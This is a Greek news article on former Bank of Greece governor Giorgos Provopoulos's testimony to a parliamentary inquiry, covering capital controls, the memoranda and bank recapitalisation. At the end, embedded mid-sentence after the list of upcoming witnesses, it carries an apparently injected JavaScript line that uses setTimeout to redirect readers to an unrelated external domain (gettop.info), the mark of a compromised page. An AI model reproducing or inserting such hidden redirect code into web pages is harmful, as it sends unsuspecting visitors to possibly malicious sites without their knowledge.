Προβόπουλος στην Εξεταστική: «Μεγάλο λάθος» τα capital control και θα το πληρώνουμε για μια δεκαετία

0
14

 

Στην εισαγωγική του κατάθεση στην Εξεταστική Επιτροπή για τα δάνεια σε κόμματα και ΜΜΕ ο πρώην διοικητής της ΤτΕ το διάστημα Ιούνιο 2008-Ιούνιο 2014, ο κ. Γιώργος Προβόπουλος τόνισε πως «δεν έχω γνώση των λεπτομερειών για επιμέρους τραπεζικές χορηγήσεις δανείων σε ΜΜΕ και κόμματα. Το θέμα αυτό το εξάντλησε ο αρμόδιος επιθεωρητής της ΤτΕ ο οποίος το είχε χειριστεί».

Μεταξύ άλλων ο πρώην μεγαλοτραπεζίτης υποστήριξε ότι, «η κρίση στην Ελλάδα θα μπορούσε να κρατήσει τρία χρόνια. Δεν θα μπορούσε η χώρα να γλιτώσει το ταρακούνημα. Όμως θα μπορούσε – αν είχε εφαρμόσει πιο σωστές πολιτικές – να σταματήσει εκεί τον κατήφορο, να δεχθεί μείωση του ΑΕΠ κατά 15% αντί για 26% και να είχε μπει σήμερα σε αναπτυξιακή πορεία. Χάσαμε σήμερα 26% του ΑΕΠ και κανείς δεν ξέρει ποια είναι η πορεία. Η αβεβαιότητα είναι τεράστιο αρνητικό οικονομικό στοιχείο για τους οικονομικούς παράγοντες».
O κ. Προβόπουλος χαρακτήρισε την επιβολή capital control «μεγάλο λάθος» που θα το πληρώνει η χώρα για μια δεκαετία. «Θεωρώ ότι τα capital controls ήταν μεγάλο λάθος. Θεωρώ ότι θα το πληρώνουμε αυτό για μια δεκαετία αλλά δεν νομοθετεί η ΤτΕ δεν εμπίπτει στις αρμοδιότητές της αυτό» είπε χαρακτηριστικά.

Επιπροσθέτως, ο κ. Προβόπουλος παρουσίασε και τους τρεις λόγους που κατά την γνώμη του λειτούργησαν καταλυτικά για την αδυναμία της χώρας να ξεπεράσει την κρίση.

Αναλυτικά το επίμαχο απόσπασμα έχει ως εξής:

Ιωαν. Θεοφύλακτος (ΣΥΡΙΖΑ) : Τι εννοείτε όταν λέτε ότι η κρίση θα μπορούσε να ξεπεραστεί σε 3 χρόνια; Τι πήγε στραβά;

Προβόπουλος: Στις άλλες χώρες τέλειωσαν με τα μνημόνια Σε εμάς ακόμα οι μύτες τρέχουν. Αιμορραγούμε και το χειρότερο δεν ξέρουμε που θα οδηγηθούμε. Δεν έχουμε ορατότητα που οδηγούμαστε και το λέω με λύπη μου μετά από 8 χρόνια. Εχω πει στο παρελθόν για ποιο λόγο το ελληνικό μνημόνιο δεν είχε την επιτυχία των άλλων. Υπάρχουν 3 παράγοντες που θα μπορούσε κανείς να ονοματίσει ως εξής:

– Η κρίση στην Ελλάδα ήταν πολύ μεγαλύτερη. Χρέος και έλλειμμα ανταγωνιστικότητας

– Εμείς – ως χώρα και πολίτες – δεν πήραμε πάνω μας την ιδιοκτησία του προγράμματος. Ξέρουμε ότι έχουμε βαριά προβλήματα χρέους, παραδοξότητες της αγοράς κλπ αλλά δεν δείξαμε ενδιαφέρον για το τι κάνουμε, για να αντιμετωπίσουμε τα προβλήματά μας. Το λέω με λύπη! Όταν ξεκίνησαν οι τροϊκανοί να αντιμετωπίζουν τις ελληνικές κυβερνήσεις, από την πλευρά της χώρας δεν παρουσιάστηκε ένα πρόγραμμα – ένα business plan – ολοκληρωμένο πως θα αντιμετωπίσουμε την κρίση. Ετσι ήρθαν οι τροϊκανοί και μας είπαν τί να κάνουμε με φόρους και περικοπές κλπ

– Εξ αρχής όχι μόνο το πολιτικό σύστημα φάνηκε ανέτοιμο αλλά και η κοινωνία. Υπήρξε κάθετη διαίρεση και το κόμμα σας (σ.σ. ΣΥΡΙΖΑ) πήρε την μια πλευρά χωρίς να γίνει μια παραγωγική συζήτηση για το πώς θα βάλουμε όλοι πλάτη για να βγούμε από την κρίση. Ούτε σήμερα γίνεται αυτό. Σε άλλες χώρες κόμματα και κοινωνία έδειξαν μεγαλύτερη συμφιλίωση.

Αν υπήρχε business plan η χώρα θα είχε ολοκληρώσει το πρόγραμμα μέσα σε 3 χρόνια. Το ΑΕΠ θα περιορίζονταν κατά 15% και σήμερα θα ειχε καλύψει ένα μέρος της απώλειας. Θα είχε φύγει μπροστά»

Αναφορικά δε για το αν ο ίδιος ως διοικητής της ΤτΕ είχε κρούσει εγκαίρως τον κώδωνα του κινδύνου, επέλεξε να «δείξει» την κυβέρνηση Γ. Παπανδρέου, υποστηρίζοντας ότι είχε ενημερώσει πριν και μετά τις εκλογές του 2010. Τόνισε δε, πως όταν μίλησε για προοπτική χρεοκοπίας «ο ΣΥΡΙΖΑ έπεσε να με φάει».

«Τα έλεγα με προσεκτικά λόγια και χρησιμοποίησα κάποια στιγμή τον όρο ότι πάμε σε χρεοκοπία και του δικού σας κόμματος βουλευτές πέσανε να με φάνε» είπε χαρακτηριστικά.

Επίσης σημείωσε ότι η πρώτη συνάντηση που έκανε ο κ. Γ. Παπανδρέου ως πρωθυπουργός ήταν με τον ίδιο: «ήταν ο κ. Παπανδρέου, η κυρία Λούκα Κατσέλη και ο κ. Γ. Παπακωνσταντίνου. Τους παρουσίασα την πορεία της χώρας με βάση τα ταμειακά διαθέσιμα. Τους είπα ότι με τα στοιχεία και του Σεπτέμβριου φθάσαμε σε έλλειμμα 10%. Αυτό έπρεπε να κάνει θόρυβο».

Ο κ. Προβόπουλος όμως είπε ότι ενημέρωσε και λίγο πριν τις εκλογές: «Με φώναξε ο κ. Παπακωνσταντίνου παρουσία του κ. Φ. Σαχινίδη. Συναντηθήκαμε και βγαίνοντας είπα ον κάμερα ότι το το έλλειμμα πάει στο 9% και αν λάβει κανείς υποψη την δυναμική του θα ξεπεράσει το 12% . Αυτά τα είπα ον κάμερα αλλά ποιος συγκινήθηκε;»

Ο κ. Προβόπουλος υποστήριξε ότι η προοπτική των πολιτικών αλλαγών που προμήνυαν οι προεδρικές εκλογές ανέτρεψαν την ευνοϊκή πορεία της οικονομίας.

Συγκεκριμένα, αναφερόμενος στους πρώτους μήνες του 2014, αμέσως μετά την επιτυχή ολοκλήρωση της 2η ανακεφαλαιοποίησης των τραπεζών είπε «εκείνη την περίοδο είχαμε κλίμα ευφορίας ότι θα κλείναμε το έτος με αύξηση του ΑΕΠ. Το καταφέραμε και θα ήταν μεγαλύτερη η αύξηση αν δεν υπήρχαν τα προεδρικά (σ.σ. προεδρικές εκλογές)».

Απαντώντας δε σε διευκρινιστική ερώτηση του κ. Σωκράτη Φάμελλου για την απόσβεση του κόστους από το PSI εξήγησε «Εκείνη την στιγμή τα περιουσιακά στοιχεία του ΤΧΣ κάλυπταν το κόστος. Τον Μάιου ή Ιούνιο του 2014 αν υπολογίζαμε τις χρηματιστηριακές τιμές θα παίρναμε τα χρήματά μας και ίσως παραπάνω πίσω». Εκτίμησε δε δεν προχώρησε τότε η πώληση των μετοχών γιατί «Αυτός που κρατούσε τις μετοχές προσδοκούσε να ανέβουν κι άλλο οι τιμές» για να επαναλάβει πως «Υπήρχε αισιοδοξία μέχρι που έπεσε λόγω προεδρικών εκλογών».

Επίσης, ο πρώην κεντρικός τραπεζίτης απαρίθμησε μια σειρά από λόγους που οδήγησαν την χώρα στην ένταξη των μνημονίων.

«Φθάσαμε στο σημείο το 2008 να έχουμε έλλειμμα ισοζυγίου πληρωμών» τόνισε σε άλλο σημείο για να προσθέσει «Και σήμερα έχουμε παρόμοιο πρόβλημα γιατί η ζήτηση είναι χαμηλή. Ο κατάλληλος τρόπος λύσης είναι επενδύσεις και αναζωογόνηση του παραγωγικού ιστού. Και σε αυτό τον τομέα περνά ο χρόνος και έχετε ευθύνες ως κυβερνητικό κόμμα γιατί ούτε εσείς έχετε business plan».

Παράλληλα υποστήριξε ότι η Τράπεζα της Ελλάδος δεν εμπλέκεται στην εγκριτική διαδικασία τραπεζικών δανείων. «Αυτό υπόκειται στη διαδικασία των εσωτερικών οργάνων κάθε τράπεζας. Ο εποπτικός ρόλος της ΤτΕ περιορίζεται στον έλεγχο των αναληφθέντων κινδύνων για την κεφαλαιακή τους επάρκεια» επεσήμανε ο κ. Προβόπουλος και συμπλήρωσε:

«Αν η ΤτΕ διαπιστώσει αδυναμία στο εσωτερικό σύστημα μιας τράπεζας, επιβάλλει ποινές και κυρώσεις οι οποίες μπορεί να είναι χρηματικές, ενώ, κλιμακούμενες, μπορεί να φθάσουν μέχρι την ανάκληση της τραπεζικής άδειας».

Επίσης, χαρακτήρισε ως αδυναμία των τραπεζών την πιστοδοτική ταξινόμηση της χορήγησης δανείων σε κόμματα ως χαμηλού κινδύνου και προσέθεσε πως η Τράπεζα της Ελλάδος έκανε έγκαιρα τη δουλειά της όσον αφορά στην Αγροτική Τράπεζα που έδινε το μεγαλύτερο μερίδιο δανείων και παρουσίαζε αδυναμίες στην πιστοδοτική της πολιτική και της συνέστησε να χαρακτηρίζει ως χορηγίες υψηλού κινδύνου τα δάνεια προς τα κόμματα.

Υπενθύμισε ότι επί προεδρίας του, ολοκληρώθηκε επιτυχώς η αναδιάρθρωση και εξυγίανση του τραπεζικού συστήματος, «χωρίς απώλειες για τους καταθέτες και χωρίς κανένας να υποστεί την παραμικρή ζημιά».

«Το ατύχημα, που θα μπορούσε ανά πάσα στιγμή να οδηγήσει την χώρα σε κατάρρευση, αποφεύχθηκε. Η αναδιάρθρωση και η εξυγίανση του τραπεζικού συστήματος , μια εξαιρετικά σύνθετη και επίπονη διαδικασία, ολοκληρώθηκε επιτυχώς, χωρίς απώλειες για τους καταθέτες , όπως επώδυνα βίωσε η Κύπρος«, σημείωσε ο κ. Προβόπουλος και μεταξύ άλλων ανέφερε ότι κατά τη διάρκεια της θητείας του οι τράπεζες υποβλήθηκαν 4 φορές σε αυστηρά stress tests με τη συνδρομή συμβούλων διεθνούς εμβέλειας, ενώ τις δύο από τις 4 φορές η άσκηση έγινε από την Ευρωπαϊκή Τραπεζική Αρχή (ΕΒΑ).

«Η στρατηγική μας υλοποιήθηκε επιτυχώς. Οι μεν συστημικές τράπεζες ανακεφαλαιοποίηθηκαν από το ΤΧΣ,οι τρείς μάλιστα και με ιδιωτική συμμετοχή την άνοιξη του 2013. Σε μεταγενέστερη φάση και μετά την διενέργεια νέων stress tests, οι τέσσερις συστημικές τράπεζες άντλησαν (την άνοιξη του 2014) και πρόσθετα κεφάλαια (8,4 δισ. ευρώ), εξολοκλήρου αυτή την φορά από ιδιώτες μετόχους. Αυτό μάλιστα αποτελούσε για μας τεράστια επιτυχία, γιατί είχαμε συγκρουστεί με το ΔΝΤ ως προς το ύψος των απαιτούμενων κεφαλαίων.

«Ως αποτέλεσμα των παραπάνω, το τραπεζικό σύστημα αναδιατάχθηκε και ανακεφαλαιοποίηθηκε επιτυχώς, με απόλυτη προστασία τωνκαταθετών και της χρηματοπιστωτικής σταθερότητας . Μάλιστα το κόστος αυτής της πολιτικής αποδείχθηκε τελικά χαμηλότερο του αρχικά σχεδιασθέντος , αφού επιστράφηκε στο EFSF ως μη χρησιμοποιηθέν ένα ποσό της τάξης των 11 δισ. ευρώ από το πακέτο των 50 δισ ευρώ. Χρησιμοποιήθηκαν δηλαδή μόνο 39 δισ. ευρώ» σημείωσε ο κ. Προβόπουλος.

Tέλος, σύμφωνα με τον προγραμματισμό, την ερχόμενη Πέμπτη καταθέτει ο διευθύνων σύμβουλος του Mega, Ηλίας Τσίγκας και ακολουθεί την Τρίτη 11 Οκτωβρίου ο νυν διοικητής της Τράπεζας, Γιάννης Στουρνάρας.

Την Πέμπτη 13 Οκτωβρίου καταθέτει ο ιδιοκτήτης του ANT1, Μίνως Κυριακού και την Τρίτη 18 Οκτωβρίου ο εκδότης του «Πρώτου Θέματος» Θέμος Αναστασιάδης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here